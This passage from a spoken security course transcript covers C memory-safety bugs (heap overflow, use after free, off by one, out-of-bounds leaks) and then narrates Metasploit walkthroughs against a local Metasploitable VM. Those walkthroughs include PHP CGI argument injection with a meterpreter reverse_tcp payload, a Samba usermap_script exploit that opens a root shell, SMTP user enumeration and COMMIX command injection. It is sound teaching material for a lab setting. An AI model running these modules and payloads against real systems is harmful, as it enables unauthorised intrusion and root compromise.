and I'll do /a.out with hello as the argument. And in this case, I get hello, a len of 5, and nothing else, because at that point, if I go back to the code, I've set n equal to 0, and because the reference of p_len, so p's len would be 0 at that point. Now, if I comment out n equals 0 on line 32 and run it like that, so I'll recompile and run it again, we get len 5, and then the reference to n still has 5, so it prints 5 again at the bottom. So now I'll uncomment the comments. So I dref_buff. So at that point, I've set p's buff and p's len to null. So if I save it in this state, where I'm dereferencing the len variable, I run gcc on the source file, and now a.out of hello, I get a segmentation fault. So we're dealing with some harder to follow logic here that modifies the internal structure of an object. And that's a recipe for disaster. As we've seen here, we get a segmentation fault, and that will lead to many problems down the line. So we have to be very careful. If a function is able to return null or set an object to null, then we have to make sure we don't try and dereference it after that function call at any time. And that concludes this demonstration of dereferencing null. In this video, I'll demonstrate how to investigate what it means to exploit the heap. In the video titled Overflowing the Heap, I presented the high-level ideas in slide form and ran through a small example on one of the slides. In this video, I'm going to expand upon the example I showed a snippet of, and we'll see the heap overflow in action. In this example code, I start with an include of stdlib.h, stdio.h, and string.h. Then on line 5, I have int main with int argc, char star argv double brackets. In the body of the main function on line 7, I start by declaring char star v equal to malloc 20. So we have a character buffer with space for 20 characters. And then on line 8, char star w equals malloc 10, another character buffer with 10 characters. On line 10, I do a printf, a formatted print of the address locations or the pointer locations for v and w and the difference between them. So printf with %p, %p colon, and then %u, the unsigned integer of the difference between them, \n, v, w, and then I cast the values of the pointer to an unsigned int and subtract the difference. So I have unsigned int in parentheses for a cast of v. On line 12, I do a stir copy, v, argv of 1. Now I do this one at unsafe, so I'll put a comment in here saying this is unsafe. When argv of 1 is more than 20 characters, we're going to overflow the buffer v. On line 13, I do a stern copy, strncpy, into w, argv of 2, so the second argument passed into the program, 9. So it will only take 9 characters, leaving space for the null terminating character, and so w should be fine, at least in terms of a buffer overflow in this case. On line 15, I have printf of the string v, w, colon, %s, %s, \n, v, w. So I print the contents of the two buffers. I print the two strings at this point in the program. On line 17, I set v, and in this case, I want it indexed at 20 to show that this is out of bounds. So this will be beyond the end of the string, which is a problem. On line 18, I have printf of v, so I show the new contents of v to see if the line 17 had any effect on the string v. On line 20, I do a mem copy, and this is another function we really need to be careful of. So I have a mem copy, w plus 5, so we're going 5 spaces or 5 characters into the buffer w. We're copying the contents of argv of 3, and then the strlen of argv. That's how many characters. So this should be perfectly fine, except for with memcopy, we're missing the null terminator. So we're potentially introducing another problem with our strings. And we'll see how this goes when we run the program. But after I perform these actions, I want to see the current contents of v and w. On line 21, I do a printf of v and w, %s to print the strings, and a \n to have a new line character, and then the arguments v and w. And then when I'm all done, I do a free of v and a free of w to correspond to the mallocs we had at the beginning. So we free the memory that's on the heap and return 0 and finish the program. Now if I switch over to my terminal window, run gcc on eg-04-06.c, gives me a warning because I'm casting from a pointer to an integer, but now it's telling me it's a different size. That's okay. The bits that I'm worrying about are very small, so we're just getting the offset or the difference between where the start of the strings happen on the heap in terms of their memory locations. This will make sense when I run the program. So a.out, I'm going to type hello world okay. So in the first line of the output, I get the memory addresses, and the only difference is the last two nibbles. so the last byte is different. On variable v, the address is at A0 and W is at C0. So they're 32 characters apart. So V and W are hello and world, so that's fine. V is still hello when I set some character off in the distance, well beyond the end of the null terminating character, so it doesn't have any impact, at least not in this example. In the last print of V and W, I get hello, comma, world okay. So everything seems to be, well, okay. So I haven't introduced any major problems. The mem copy is okay because the string in argv3, so on line 20, is only 2 characters in size. So we're not writing past the end of the buffer W. My input isn't unsafe, but if I just hand the string hello into the program, we don't see any problem. So at first glance, the heap vulnerabilities don't show themselves. Where it becomes a problem is when we start giving it larger strings. So if I go to the terminal window and run a.out with a long string, so I'll use 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, and I'll do this 3 times because there's 32 characters difference between where the 2 buffers are. So if I do 1 to 9 3 times, I get to 30, then 1, 2 gets me to 32. If V points to a string with only 20 characters in space, I've already written past the end, and if I get all the way to 32, I've taken up all the characters between V and W, and we're going to be overflowing the heap into W. So my next variable, I'll leave W as world, and the last parameter, argv of 3, I'm going to give it the numbers from 1 to 9. Actually, let me give it something else. I'm going to give A, B, C, D, E, F, G, H, I, J, K. So we'll give something that is 11 characters. So we're going past all the buffers at this point with some simple input changes, and it gives me a segmentation fault. So we're turning this into a mess and corrupting some memory, overflowing the heap, potentially introducing all kinds of problems. The strangeness of the output now shows itself. So even on the first print of V, we get the numbers from 1 to 10 3 times to 1, 2, and then world is appended right onto the end. In memory, we've taken up all the space for V and all the space in between V and W right up to the start of the variable W where the buffer starts. So there's no null terminating character in there, so we get the whole thing. So it bleeds into the next variable. So we're going through the heap, and then at the beginning, world is fine for W. So the contents of V at this point, so we have 1 to 9, 0, 1 to 9, 0, and then the letter A that we inserted. So if I go back to my code and look at V of 20, so V of 20 is A. So A should be the first character past the end of the string V, or past the valid buffer. So anything from A onward has overflown the heap. So we're into overflow territory here. And then we have world. And V and W, at this point, at the very end, we not only have the buffer V and all of the overflow that bleeds into the buffer W, and then all of the letters, everything all jumbled together. And because we've gone so far off the end, we get a segmentation fault, and things aren't looking too good for us. These heap vulnerabilities show up for some common reasons, which include improper indexing, unsafe bounds or lack of bounds checks, unsafe pointer arithmetic, and improper use of string functions. And that concludes this demonstration of exploiting the heap. A use after free means continuing to use a pointer to a location in memory after it has been freed and possibly reused elsewhere, which causes problems of memory corruption and undefined behavior. The main cause of a use after free error results from errors in condition handling or exceptions, or by mistakenly freeing a pointer that is still in use elsewhere. Double free and dangling pointers are particular instances of this. In this example, I'll demonstrate a common condition where this can occur and is easy to overlook. So I'll start on line 1 of my example code where I do a hash include of stdlib.h, I include stdio.h and string.h. And then on line 5, I define a structure, struct buff, and then in the braces in the body of the structure, I define char star buff and size underscore t len. So it's going to be a character buffer with its corresponding length. Then on line 10, I define a function called clearBuff. So it returns void, clear_buff, and then in parentheses, its parameter is struct buff star p. And all this does is call free on p arrow buff. So it's going to free the character buffer within the structure p, but it doesn't free p, and that's all it does. Then I define my main function on line 15, int main with int argc, char star, argv double brackets to define the function. Then in the body of my main function, on line 17, I have struct buff star p equals malloc size of struct buff. So we allocate the memory for p. And then I allocate memory for another area in memory, char star b equals malloc 10. So it's a character buffer of size 10 pointed to by the pointer b. On line 20, I call stern copy strncpy with b, argv of 1, 9. So it's going to copy into b the string from argv1, the first argument passed into the program, and it's going to copy at most 9 characters, and this excludes the null terminating character, so there should be enough space in b to handle the 9 characters at most that we get from argv of 1. Then on line 22, I set p arrow buff equals b and p arrow len equals strlen of b. Then on line 25, I create another pointer of size underscore t star n equals ampersand p arrow len. So it's going to point to the length, the len variable, inside of our buff. So it's pointing inside of the structure. On line 27, I do a printf. So the format is %s \n, b. So it's going to print the buffer b. And then printf with len : %lu for long unsigned integer. \n, the dereference of n, so star n. So at this point, it should print the length. Then on line 30, I call clear_buff of p, and then I free p. So clear_buff frees the buffer inside of p, so the character array that was allocated. So it's freeing what was allocated on line 19. So the malloc of 10 gets freed, and the freeing p, it corresponds to the malloc of the structure on line 17. But then on line 33, I do a printf of %s \n, b. So this is a problem. At this point, b is dangling because it's been freed. And then an even worse problem on line 35, where I do a stir copy, which should be a stern copy, strncpy, of b, argv of 2, so it's taking the second argument at this point, 9. So this is an even worse problem, because we're not just trying to read garbage values, we're actually writing to an area in memory that may have been reused or is no longer in use because it's already been freed. And then what quite often happens in this case is after the stern copy, someone will call free of b, thinking b is perfectly fine. So the functionality to free b was taken care of inside of the function clearBuff, but that was missed and it was reused, and then free was called again. So there's a dangling pointer and a double free happening here in our use after free scenario. So I'll switch over to my terminal window, run gcc on the example, and do /a.out of hello space world. It executes successfully, although it prints hello and len5, which is what's expected, so that's fine. But then there's a blank line, if I switch back to the code, where I did the printf on line 33. If I remove that line of code, the clearBuff, and comment it out, go back, and then recompile the code, this case, calling a.out of hello world works fine. So when we free it, in that case, there's no problem of a use after free. If I free p, the structure p, I'm freeing the structure, but the buffer b is still valid from the malloc 10 because there's only a pointer within p, and that pointer is not freed, so that's perfectly valid. Another problem I might have, if I uncomment line 30 again, I do a clearBuff of p, I free p, and then I dereference n and change the %f in the printf on line 33 to %lu, Save it. So %lu \n, *n, where I'm dereferencing n, and I recompile and run it again. At this point, our *n, the dereference of n, shows this big, huge number because it's been freed. And at that point, we're using it after it's been freed. And again, we have a problem. And that concludes this demonstration of problems encountered with use after free. In this video, I'll demonstrate how to recognize and avoid looping off by 1 in a C program. I'll demonstrate looping off by 1, but also memset and sterncat, and how off by 1 affects those common functions as well. I start the example on line 1 with a hash include of stdio.h and an include of string.h. Then I declare my main function, int main, with int argc, char star argv, double brackets, as typical for main functions. And then on line 6, inside the body of the main function, I declare a buffer char s of size 10, so 10 in square brackets. And then I set all of the values in the buffer, all 10 values, to the value 0. So it's going to be a string with all null terminating characters. So it's an empty string, but everything is set to the 0 character or the null terminating character for the entire array. So on line 8, I have memset with s, 0, 10. Now this is okay. With memset, in this case 10 has to match the size of the buffer it's writing into. So in this case, the number of characters it's going to write. And it sets the entire thing to 0. But the string function sterncat is a little different. So sterncat takes the number of characters in a string. So in line 10, I have sterncat of s, argv of 1. So we're taking the first argument passed into the program, 10. But this is taking 10 characters, ignoring the null terminating character because it's a string function. So passing 10 in this case to match the size of char s is an error, and it's off by 1. It should be 9 in this case to allow a single character space at the end for the null terminating character. So I'll leave that the way it is for now, and I'll demonstrate a problem with this for loop I have on line 12. For int I equals 0, semicolon, I is less than or equal to 10, where I introduce an off by 1 error, semicolon, I plus plus. So this is going to actually loop for 11 iterations instead of 10, but it's more of an off by 2 error because we're looping through all 10 characters because I'm using I as an index into S, where I have 13 S indexed at I equals the character A plus I. So what this is doing is taking the character at value A and adding an offset so that we can loop over individual characters. So the first iteration of the loop, S of 0, will be set to the character uppercase A. And then the second iteration, where I is equal to 1, S of 1 will be equal to A plus 1, which will be the character, the uppercase B. So we should get A, B, C, D, and so on. Now, if the size of char S was very large and we looped over many, many iterations, say if the character buffer S had 5,000 characters in it, was the size of 5,000, and we looped over 5,000 times, then we'd have a problem because the value of I would get too large to be held within 8 bits. And that's another problem that could be introduced here. And once we exit out of the loop, on line 15 is printf of %s \n, s. So there's a few problems here. S won't be null terminated at this point. We overwrite the reason for having line 10 here completely, but we'll run the program as is for now, and then we'll come back, we'll change the code, fix a few of the problems, and see how we could do this better. We'll do GCC of this eg-04-10.c, and the program name will be a.out, and I'll pass in the string hello, and it gives me a problem. So it prints the letters A, B, C, D, F, G, H, I, J, K. So we're actually going beyond 10 characters, and then we get some garbage, and it gives me a stack smashing detected because we went past the end of the buffer into the other parts of the stack, overwrote the stack canary, and the program kicked us out. So it handled it gracefully enough. Now I'll go back into the program and we can fix some things here. So the memset on line 8 is fine. On line 10, the stern cat needs to be changed from a length of 10 to 9. So we're no longer off by 1. And let's do something with that result. So I'll put some space in and I'll do a printf and put in the string. So double quotes %s \n, close my double quote, comma s, semicolon, save the program, and we keep that fixed. So we'll see what argv1 contains up to 9 characters. In the loop, instead of 10, I'm going to go not just less than 10, but less than 9. And after the loop, I'll do s of 9 equals single quote \0 single quote, the null terminating character. So we make sure the string is null terminated and that we don't go past the end of the buffer and we no longer have a problem. So on line 13, my comment where it says we have a problem, I say we no longer have a problem. Save this result, switch back to my terminal window, gcc eg-04-10.c, enter, compiles without any warnings or errors, /a.out, and I'll say success as the string of the argument, and the program prints success, and the characters A, B, C, D, E, F, G, H, I, the first 9 characters of the alphabet in uppercase, and our off by 1 errors are no longer. And that concludes this demonstration of looping off by 1. In this video, I'll explore how to execute arbitrary functions through function pointers introduced by coding errors or unsafe use of function pointers. This will be a manufactured example, but where this becomes a real vulnerability is where other errors induce this behavior, such as an abuse of a buffer overflow, an off by 1, or out of bounds error, which might then be turned into an exploit. The example code I have starts on line 1 with #include stdio.h. On line 3, I have struct obj, and in the body of this object, I have int I and void in parentheses *f, and then in parentheses void. So it's a function pointer. Then on line 8, I have void func1 with no parameters, and in the body of that function, there's a printf of func1 \n. On line 13, I have void func2 with printf func2 \n inside the body of the function. So we have 2 functions here that the function pointer inside the object is going to point to. Then I have int main. On line 18, I have int main, int argc, comma, char star argv double brackets. And then in the body of the main function, on line 20, I have struct obj of a. On line 22, I set a.i equal to 0, then a.f equal to func1. So a.f is the function pointer. It's pointing to func1 at the beginning. And with a little bit of arithmetic, I'm going to have it pointing to func2 by the end of main. On line 25, I have printf with the formatted string %p, %p \n. So we're going to print the pointers, the addresses to func1 and func2. On line 27, I have printf %p \n, a.f. We'll see what the function pointer is pointing to. On line 29, I look up the difference between the offsets, the actual address offsets between func1 and func2. I set a.i equal to func2 minus func1. I do a printf on line 30 with %i \n, and I print a.i. On line 32, I change the value of the function pointer by the offset. I have a.f plus equals a.i, and this will move the function pointer, which is pointing to func1, to pointing to func2, and I call the function to verify that. On line 34, I have a.f, double parentheses, to call the function, and it should print the text func2, and then return 0. I'll switch over to my terminal window, compile the example GCC of eg-04-12.c, and run /a.out that was just compiled. I see the addresses, so I have 0x556254E70169, and then comma 0x556254E70180. So there's a small difference, and it's in hexadecimal, so the difference is a little bit more than what we might expect. On the next line, what A.F is pointing to, and it's the same as the first value on the first line, func1. The difference between the addresses of func1 and func2 is 23, and then at the end it prints func2, where A.F is pointing at this point. Adjusting the function pointer explicitly like this is the reason I called this a manufactured example. But anytime you have an overflow that can affect a function pointer, or an off by one, or an out of bounds, and in some cases a use after free, or any type of exploitation of the heap, which covers the full gamut of topics I've covered in this course. So anytime there's an error, and an error that can overwrite a function pointer, this type of behavior can be exploited by an attacker. And that concludes this demonstration of executing arbitrary functions. In this video, I'll explore an out-of-bounds error and how it can leak sensitive information in some cases. In this example, the out-of-bounds write reveals a password. On line 1 of my example, I include standard.io.h and include string.h. Then I define a struct on line 4 called user. I define this with char name of size 8, char pass of size 8, size underscore t called sz, underscore name, so the size of name, and size underscore t of sc underscore pass. Then on line 11, I have int main of int argc, comma, char star argv double brackets. I define struct user u, so we have an object u. On line 15, I do a stern copy with u.name, comma, argv1, comma, 8. And then stern copy u.pass, argv2, comma, 8. So the program is going to take two arguments. The first argument, a name, and the second one, a password. And then on line 18, I do a printf of the formatted string, %p, comma, %p, \n, comma, u.name, comma, u.pass. So I print the address locations of those variables. And then on line 20, I set u.scName equal to strlen of u.name. Now I'm not really going to use the size of the password, so I'll just leave that off. And on line 22, I do a printf with hello, comma, %s \n, comma, u.name. So I print the name, and then printf name length of %lu for a long unsigned integer \n, comma, u.sc underscore name, and I return 0. I'll switch over to my terminal window, compile with GCC of eg-04-13.c. It compiles successfully. I run /a.out with Steve as the first argument, and for the password, I'm just going to type secret for the sake of the example. I hit enter. I see the address locations printed, and I get hello, comma, Steve, name length 5. So that's fine. But we created these buffers in the object user of size 8. Now, if I run the program again with /a.out Steve, I'm going to change my username to Steve123. 8 characters. If the name buffer inside of user is defined to hold 8 characters, there's going to be a problem because we haven't left any space for the null terminating character. So Steve123 takes up all of those characters. So it's not going to be null terminated. So what happens in this case? Well, I get hello, comma, Steve123 secret when I try to print u.name, and the name length looks like it's 14 because we've removed the null terminating character and we go out of bounds to actually grab information from the pass field and get the password. So instead of just printing the username, we print the password as well. So anytime there's an out of bounds error like this, where we go out of bounds, we could be pulling in some very sensitive information that gets returned when it shouldn't. And this can very easily lead to exploits such as revealing passwords or revealing other information that could lead to privilege escalations or even segmentation faults that crash a program and lead to instability. And that concludes this demonstration of exploiting out of bounds. In this video, I'll demonstrate how to navigate the basic commands used to prepare exploits in Metasploit for penetration testing. I'll start with the first steps of getting started with Metasploit. The first thing to do is to install Metasploit. And this is done from the Rapid7 Metasploit project in GitHub. And I've jumped right to the exact file we need to download using curl from the installation instructions. So in my terminal window, I have the command curl with https://rapid7/metasploit-master/config/master/templates/metasploit-framework-master/msf-update.erb. And then greater than to msf install. So it's going to save the msf install file in my local directory. And if that's successful, I have double ampersand and then backslash, and then down on the next line I have chmod 755 msf install. So it's going to make it executable, double ampersand, backslash, and then once it's executable, I can run it with /msf install. So the install process is one big long line, and I'll hit enter, and the script downloads the files I need. The script required that I authenticated using sudo, so I did that, and it's going to carry out the install. And now I can run msf console to start Metasploit in the console mode. And I'm going to delete my existing data and configurations. I did have it installed here previously, and it asks me initial MSF web service account username. I'll just leave it as my local account. And we get to our MSF prompt after it's been installed. So we can interactively run Metasploit commands from here, but after a fresh install, the first command, and a command we should run every so often, is msf update. So this updates our Metasploit database, and in this case, it tells me I'm at the latest version already. So a few commands to get started. Obviously, the first thing is help, and I'll have to scroll up here because there's quite a long list of commands that can be run, and their options, and with about 20 or so core commands where you should get started first. Then getting familiar with the search feature and its options is the step I'd recommend taking next. There are at least a couple of thousand exploits in the Metasploit database, and you can browse through them, but it's more efficient to get where you need just by searching. So at the very least, since we're focusing on Linux in this course, we can search as follows. Search name : Linux. And here it gives me 152 Linux exploits, and they're all returned by number. And if I can scroll up, I can see all of the information. There's some payloads in here. There should be some more exploits, things that can be done targeting Linux with our Metasploit install. Now we may want to narrow this down. We could do it a few different ways. I can do a search name : Linux and then specify a type. So a type could be something like a payload or an exploit. If I put type : exploit, it gives me 21 different options. And let's narrow this down a bit. I can type CVE : 2019. In this case, it gives me a single result. And if I'd like to use this particular one, I can type use and specify a number, or I can specify its full name, including the full exploit /linux/local/ptrace_traceme_pkexec_helper. So I'd have to type out the whole thing. And if I type use 0, it'll switch over to the mode where it specifies that I have the exploit loaded, and it shows the full path of the exploit that I have loaded. And at this point, I could just type exploit if I want to carry out the exploit, or I could type info if I want to print more information about the full impact of this exploit and payload information. So a description of it, where it comes from, what platform, who wrote the exploit. And so there's a number of different options that I can specify. Sometimes it lets me specify the remote source IP address and port, depending on the exploit and what it's targeting, and some references to where the exploit came from. There's a few other commands I can type to narrow things down. I can type show payloads to show payloads for this exploit. So it gives me a list of compatible payloads I can try. Show options. So it gives me the local host and local port. the compile and session options. And at this point, we're ready to start. And that concludes this demonstration of exploring Metasploit commands. In this video, I'll demonstrate how to get up and running with a vulnerable virtual machine called Metasploitable, which is intentionally built with known vulnerabilities for testing. This is targeted towards tools like Metasploit so that we can test and learn without compromising a running system. The download for Metasploitable is hosted on SourceForge. So if we browse to the Metasploitable 2 folder, to its download folder, in the files we can download the latest version, Metasploitable Linux 2.0.0.zip. I've already done the download of this zip file and extracted it to a local folder. Now, under documents/metasploitable2-linux, where I've extracted it, I'll type ls, and there are some files that I've extracted from the zip file. The important one here is the metasploitable.vmdk. This is the virtual machine disk image, compatible with VMware and VirtualBox, and with QEMU. I'm going to use QEMU to emulate this vulnerable virtual machine, but first I want to convert it to the QEMU disk image, the QCOW2 format. For this, I'll use QEMU-img convert -O QCOW2 metasploitable.vmdk and then metasploitable.qcow2. This converts from the virtual machine disk image to the QEMU QCOW2 format. Now I type ls and I see the new file I've created, metasploitable.qcow2. So I can run this image using QEMU system-x86_64, then -m2g for 2 GB of memory, -nic user. As I mentioned in a prior course, I recommend against enabling network access, at least not full network access. We need limited network access, so I recommend opening the ports needed to carry out the exploit you're looking to test. In this case, I'm going to forward port 22 for SSH access from our host machine from the current machine. But because this virtual machine will be vulnerable, I want to keep it relatively closed off to the rest of our network. So I'll put a comma in and host FWD for host forward equals TCP :2022 So this is going to forward port 20022 from the host machine to port 22 in the virtual machine. So this is the SSH port. Then -HDA metasploitable.qcow2. And I'll hit enter to launch the virtual machine in QEMU. It'll take a few moments to go through the boot process, and then we should be able to log in. Now that we've booted, we're at our Metasploitable login. The default login is msfadmin and msfadmin for the password as well. And even here it shows, warning, never expose this VM to an untrusted network, which is very important because it is vulnerable. So after I log in, I want to make sure that I can actually connect to the outside world through my host, and I'd like to make sure that I can connect via SSH into the virtual machine. But that's all we should be able to do. If I type ifconfig, we'll see that the ETH0 device, the emulated Ethernet device, has an address of 10.0.2.15. The standard addresses, or the local addresses on my network, are of the form 192.168.2. So this isn't accessible from my local network outside of the forwarded port I defined. Now I can test if I can connect to the outside world by pinging some external IP address like 1.1.1.1. And in this case, it does ping the outside world. I'll type Control-C to cancel that. So I can connect. And if I'd like to connect to the host machine, I can actually connect through the IP address 10.0.2.2. So this connects to the host computer. And you can see the ping times here are 0.169 milliseconds, 0.145 milliseconds. So it connects very quickly to the host machine, and it should because it's running on the same computer. I'll type Control-G to release my cursor, switch over to my terminal window on my host Linux machine, and I'll open up another terminal window so I can get access to a command prompt that I can type in SSH -p 20022 msfadmin at localhost. So this is the port that's mapped to the port 22 inside of the virtual machine. So it connects and asks me for a password, msfadmin, and now I'm connected. So the virtual machine can connect to the outside world through the host computer, but nobody can connect from the outside, and it's only accessible through the local network through port 20022 on the host machine. So there's only a single port that's accessible. And that concludes this demonstration of getting up and running with a vulnerable virtual machine. In this video, I'll demonstrate how to prepare a Metasploit command that exploits a vulnerable web service. In this case, I'm going to exploit an outdated version of PHP running behind the Apache web server. So I've started my virtual machine, my Metasploitable virtual machine, which I described in the video titled Running a Vulnerable Environment. I've launched it with sudo QEMU-system-x86_64, then -m 2g for 2 GB of memory, -nic user, host fwd equals tcp://2002:22 to map the local port 20022 to the SSH port in the virtual machine, host fwd equals tcp://80:80 to map the web port, the HTTP port 80 to the local 80. And this is the reason why I needed to run the command with sudo, so I can map to port 80. And then -hda metasploitable.qcow2, the virtual machine image for Metasploitable. Now I'll switch to another terminal window where I have Metasploit running. So I've run MSF console, and now I'm going to scan the web server running in the virtual machine. So I'll do that with use auxiliary/scanner/http/http_version. And now set our hosts localhost, because I've mapped the local port 80, the web service, to the virtual machine. And now I'll type run, and it gives me a result. So it says I have Apache /2.2.8, Ubuntu Dev/2 powered by PHP /5.2.4 -2 Ubuntu 5.10. So PHP 5.2.4 is quite an old version, and that's what I'm going to target in this video. So I'll do a search for PHP CGI, and in the results, the target I'm going to use is exploit/multi/http/php_CGI_arg_injection. So it's a PGP CGI argument injection exploit. So that's number 7, so I'll type use 7. And it tells me there's no payload configured, so it's defaulting to php/meterpreter/reverse_TCP. So this payload is okay. If I type show payloads, I can see other payloads that are available, but I'll stick with the default in this case. Now I'll type show targets, and in this case, it's automatic, so I don't need to specify a target, and show options. I do need to set our hosts for the exploit. So I'll type set our hosts 127.0.0.1, or I could just type localhost. Either is fine. And now I'll type exploit or run. Either will be fine, and it will carry out the exploit. And it connected and opened a meterpreter session. And now I need to test to see if it worked. I'll type ls just to make sure. And it gives the contents of the var www folder inside of my remote virtual machine. So it shows all the folders inside the web folder. Now we're up and running with shell access due to a vulnerability in an outdated version of PHP. And now I can run commands on the remote system through that PHP vulnerability. And that concludes this demonstration of exploiting a vulnerable web service in Metasploit. In this video, I'll demonstrate how to scan a mail service running SMTP, the Simple Mail Transfer Protocol, for its version, whether it's vulnerable to SMTP relays, and to see if we can enumerate its users. So I've launched the Metasploitable virtual machine, as I described in the video titled Running a Vulnerable Environment. So I've run it with sudo QEMU-system-x86_64 -m 2g for 2 GB of memory, -nic user for user mode networking, host fwd equals tcp://25 -25. So I'm mapping the SMTP port 25 to the localhost port 25 so we can open up access through the user mode networking to our Metasploitable virtual machine. Then -HDA Metasploitable.qcow2, the Metasploitable virtual machine image. And now I'll switch over to my other terminal window where I have the MSF console running, the Metasploit console, so I can run the Metasploit commands. So I start by running use auxiliary AUXILIARY /scanner SMTP /SMTP _version. And now show options, and we can set the R hosts, the R port, and the number of threads. In this case, R hosts we need to set, so I'll type the command set R hosts to localhost, and the port is fine, so I just need to set R hosts and type run to carry out the scan. And it tells me that we have ESMTP postfix Ubuntu /x0d/x0a. So it doesn't give me as much information as I'd like, but it tells me it's running postfix, which is the SMTP service. Now I'll try another scan. So use auxiliary /scanner /SMTP /SMTP _relay. I'll type show options, and it gives me a few options. It has an extended option to say do all the 16 extended checks. I'm going to set this to true. So set extended true. Mail from is the from address. Mail to, the to address. The R hosts I need to set. So set R hosts of localhost. The R port 25 is fine, and threads 1 is okay. Now we'll test to see if this is vulnerable to an SMTP relay, which spammers will use to send email from our mail server if we don't protect it and disable relaying, which is now the default in most mail server implementations. And there was no relay detected, which is a good thing. And now I'll do one more thing, use auxiliary /scanner /SMTP /SMTP _enum. And now I'll type show options and set R hosts. So set R hosts localhost. I can also set the port if I need to, the number of threads, Unix only, in this case true, because I'm only testing a Unix server, and a user file that contains a list of probable user accounts. So these will be common Unix user accounts. And I'll type run. It may take some time to complete, but when it returns, it should give some users that are found on the remote system, on the mail server. And it does give me a list, many of them common Unix accounts, but also contains accounts like Postmaster and Postgres, Postfix, MySQL, and these are all accounts we could potentially use to try and get access to the mail service. And that concludes this demonstration of scanning SMTP for vulnerabilities using the Metasploit commands. In this video, I'll demonstrate how to exploit an outdated Samba file sharing service to gain root access using Metasploit. So I have my Metasploit console open. I'm going to use auxiliary /scanner SMB /SMB _version. Now I'll type show options, and I need to set our hosts. So set our hosts to 127.0.0.1. Now the reason I'm setting it to 127.0.0.1 or localhost is because the way I've run QEMU with my Metasploitable virtual machine. So I've run it with sudo QEMU-system-x8664-m2g for 2 gigabytes -nic user for user mode networking with host forward host fwd equal TCP:139 the default SMB port, and then -HDA Metasploitable.qcow2 specifying the Metasploitable virtual machine image. Now I'll switch back to Metasploitable and type run to run the scan for the SMB version. And it's telling me that I'm running Samba version 3.0.20. Now I'd like to search using search name Samba. This returns quite a few results, 17 in total. And we can look through and see if any of them apply to what we're trying to do. And it's good to find ones that are flagged as excellent. And I see one here, multi/samba/usermap_script. And the description is Samba usermap script command execution. And in this list, it's number 12. So I'll type use 12. And it tells me no payload is configured, so it's defaulting to cmd/unix/reverse_netcat. I'll stick with the default for now and type show options to see what options we need to set. So we need to set our R hosts. The R port is already set to 139, the default. So I'll set R hosts 127.0.0.1 because that's the mapping to our virtual machine through the port 139. Now I could also do show payloads to see what other payloads we can set, but I'm going to stick with the default. And all there's left to do is type run, and it tells me command session 1 opened. I have a blinking cursor. Now it's not apparent that anything happened. So one thing I can run is ls. It looks like I get the root of some Unix system. But what Unix system? Is this my local computer or is this a remote system? Another way I can tell is type ls/home, and I see there's an MSF admin user, which is not on my local system, but on the Metasploitable virtual machine I'm running. And I can type who am I, and it returns root. So I'm connected to this remote system where I can run shell commands, and I'm connected as root. If I type W, it'll show what users are connected to the system, and at the moment only root is. And that's the session I have open now. So I've successfully gained root access using Metasploit through this outdated and vulnerable Samba file sharing service. And that concludes this demonstration of exploiting vulnerable file sharing services using Metasploit. In this video, I'll demonstrate how to test for command injection vulnerabilities in web-based applications using COMMIX. So COMMIX, C-O-M-M-I-X, looks for system commands in PHP scripts, injects commands, and gives you an interface to inject commands that makes it convenient to do so. So I've run my virtual machine, my Metasploitable virtual machine, using sudo QEMU-system-x86_64 -m2g for 2 GB of memory, -nic user for user mode networking, host fwd equals TCP :80 So this maps the local port 80 to the remote port 80 on the virtual machine. So I can access it through the local host. And then -hda metasploitable.qcow2, the virtual machine image. Now I'll switch over to my other terminal window and I'll cd into the COMMIX folder, cd COMMIX. And in this folder contains all the files I need. This project comes from github.com/commixproject. So I've cloned the repository here. I can run commix using Python 3 commix.py. Then /URL equals, and then I specify a URL I'm going to use. I'm going to get this URL from my virtual machine. If I switch over to my QEMU window and log in with msfadmin and msfadmin as the password, and I'll cd into /var/www, and I'll do an ls, I have a file in here called system.php. And I'll inspect the contents using cat of system.php. And all of this PHP file contains is the open PHP tag, so $PHP, then $exec equals $_get, and then in square brackets the string exec. So it's looking for a get parameter exec, and then it echoes system of $exec. So system runs the command locally, and this is the most important point of using COMMIX. It's looking for some system command being run where a command is executed locally, and it exploits that command so we can type in and send whatever commands we want without having to edit a URL every time we want to send a command. So I'll switch back over to my window with COMMIX, and I'm going to put in the URL http://localhost/system.php ? Equals, and I can put a command in just for a placeholder ls. And it seems to connect, and it says, do you want a sudo terminal shell? And I hit yes. And now if I type a command, ls, it tries to send that command and show me the results. And it does show me the results of the var www folder on the remote machine. And I can type pwd to see what folder I'm in just to verify, and it shows that I'm in /var/www. I can type who am I to see what user I'm connected as. And since I'm connected through the web service, through PHP, it's showing me I'm accessing it as the user www-data. So everything here is relayed through the vulnerable PHP script so I can run remote commands. I can even create files. Let's try the touch command, touch file.test. And now if I type ls, I should see it come up in the contents. And I do. I see file.test in the output. And that concludes this demonstration of command injection through PHP using comics. In this video, I'll demonstrate how to search for exploits and shell codes using the exploit database. This can be considered a complementary tool to other pen testing tools such as Metasploit. From the database, we get vulnerability descriptions, which include the target, platform, and a proof of concept if available. It also gets daily updates, and you can use it online at exploit-db.com or from a command line tool, SearchSploit, which I'm going to demonstrate in this video. To get the database and the SearchSploit tool, we do a git clone of https://github.com/offensive-security/exploit-database.git. And this will clone the repository locally into a folder called exploitdb. I've already cloned it, so I'm not going to do that again here. So I'll just cd into exploitdb, type ls, and we can see the contents of the folder. And from here, we can do /searchsploit-u to do a full update of the database. So that should be your first step. If you want to keep exploitdb updated locally, every so often run searchsploit-u. This database is updated on a daily basis, so you can run it every day and get new results. Now, I've already updated it, and one of the pieces of information is good to have when you're searching for exploits is the kernel version of the system you're running. In my case, I'm going to run uname-srm, and this gives me my Linux kernel version, the one that I'm running on this system. So whatever system you're looking at, you can run uname-srm, or for a more comprehensive look, you could do cat of /proc/version and get more details about how your version of Linux, the compiler, and the flavor it's running, in my case, Ubuntu. And you can use this information in your searches using SearchSploit. So if I want to do /searchsploit of Linux kernel 5.4, we can run the command. And you'll notice here there's none specifically for 5.4, and it picks up each of the terms Linux kernel. It doesn't do an exact search. Now it's searching for each of the terms individually, so it finds Linux and kernel and some various sources for the exploit title. I can make the search a little broader by removing the version and putting just Linux kernel, and it gives me exploits, shell codes, and papers with their corresponding titles. Now, if I want to do a strict search and search for an exact match, I can do something like /searchsploit-s for strict, Linux, kernel, 3.13.0. Now, this will still be case insensitive, so I don't need to specify it exactly, but it does give me some exact results in this case. And it also gives me a path to the code or the exploit, which I can copy. In this case, the first one gives me linux/local/37292.c. If I look in ls exploits, there are a number of subdirectories that contain exploits based on the OS and platform. And in this case, I can just 